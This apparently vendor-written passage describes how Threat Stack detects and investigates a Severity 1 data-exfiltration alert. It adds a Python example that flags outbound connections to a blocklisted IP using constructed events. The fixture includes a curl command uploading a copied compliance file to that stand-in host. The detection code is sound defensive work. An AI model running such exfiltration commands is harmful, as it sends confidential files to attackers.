Detect

As soon as risky or anomalous behavior trips one of the rules in Threat Stack's out-of-the-box rulesets, teams are alerted in real time and are provided with contextual information, including the process that was run, who ran it, the location, the severity level, and more. The following alert shows attempted data exfiltration, which is classified as a Severity 1 alert, indicating a high possibility of a bad actor. First, Threat Stack presents basic information about the alert, such as the source IP, command, user, and event type, to give a better understanding of what caused the alert, so operators can take appropriate action in accordance with existing response workflows.

Investigate

On clicking further into this data exfiltration alert, Threat Stack presents more in-depth information to help teams investigate the true severity of what has happened, including any associated events, other commands run in the session, and information on whether it came from outside the network or was an insider threat. In this case, it looks like there was a connection with a known malicious IP in Ukraine. By looking at other associated events, it appears that this user was able to connect through a known vulnerability and executed commands that gave him or her access to secret compliance files. Threat Stack presents information about any additional contributing events, such as the connection to a blacklisted IP, thereby giving visibility into the path taken by this bad actor.
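As an added illustration (not Threat Stack's own code or rules), the Python below applies one such rule to constructed host events: an outbound connection to a blocklisted IP raises a Severity 1 alert that carries the basic context (user, command, source IP, event type), an insider/external classification, and the other commands from the same session. The blocklist entry, internal address range and event field names are assumptions.

```python
import ipaddress

# Assumed internal address range used to classify the source as insider/external
INTERNAL_NET = ipaddress.ip_network("10.0.0.0/8")
# Constructed blocklist entry (TEST-NET-3 documentation address, not a real indicator)
BLOCKLIST = {"203.0.113.77"}

# Constructed host events: session s42 stages a compliance file and uploads it,
# session s43 is ordinary admin activity
EVENTS = [
    {"ts": 1, "session": "s42", "user": "www-data", "type": "process",
     "cmd": "cp /srv/compliance/audit.pdf /tmp/a.pdf", "src_ip": "198.51.100.5"},
    {"ts": 2, "session": "s42", "user": "www-data", "type": "connect",
     "cmd": "curl -T /tmp/a.pdf http://203.0.113.77/", "src_ip": "198.51.100.5",
     "dst_ip": "203.0.113.77"},
    {"ts": 3, "session": "s43", "user": "alice", "type": "process",
     "cmd": "ls /var/log", "src_ip": "10.1.2.3"},
]


def evaluate(events, blocklist=BLOCKLIST, internal=INTERNAL_NET):
    """Apply one rule: an outbound connection to a blocklisted IP is Severity 1.

    Each alert carries the basic context plus the other commands run in the
    same session (in time order) and whether the source was inside the network.
    """
    by_session = {}
    for e in events:
        by_session.setdefault(e["session"], []).append(e)

    alerts = []
    for e in events:
        if e["type"] != "connect" or e.get("dst_ip") not in blocklist:
            continue
        src = ipaddress.ip_address(e["src_ip"])
        session_events = sorted(by_session[e["session"]], key=lambda x: x["ts"])
        alerts.append({
            "severity": 1,
            "rule": "outbound connection to blocklisted IP",
            "user": e["user"],
            "command": e["cmd"],
            "src_ip": e["src_ip"],
            "dst_ip": e["dst_ip"],
            "event_type": e["type"],
            "origin": "insider" if src in internal else "external",
            "associated": [x["cmd"] for x in session_events if x is not e],
        })
    return alerts


if __name__ == "__main__":
    for alert in evaluate(EVENTS):
        print(alert)
```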
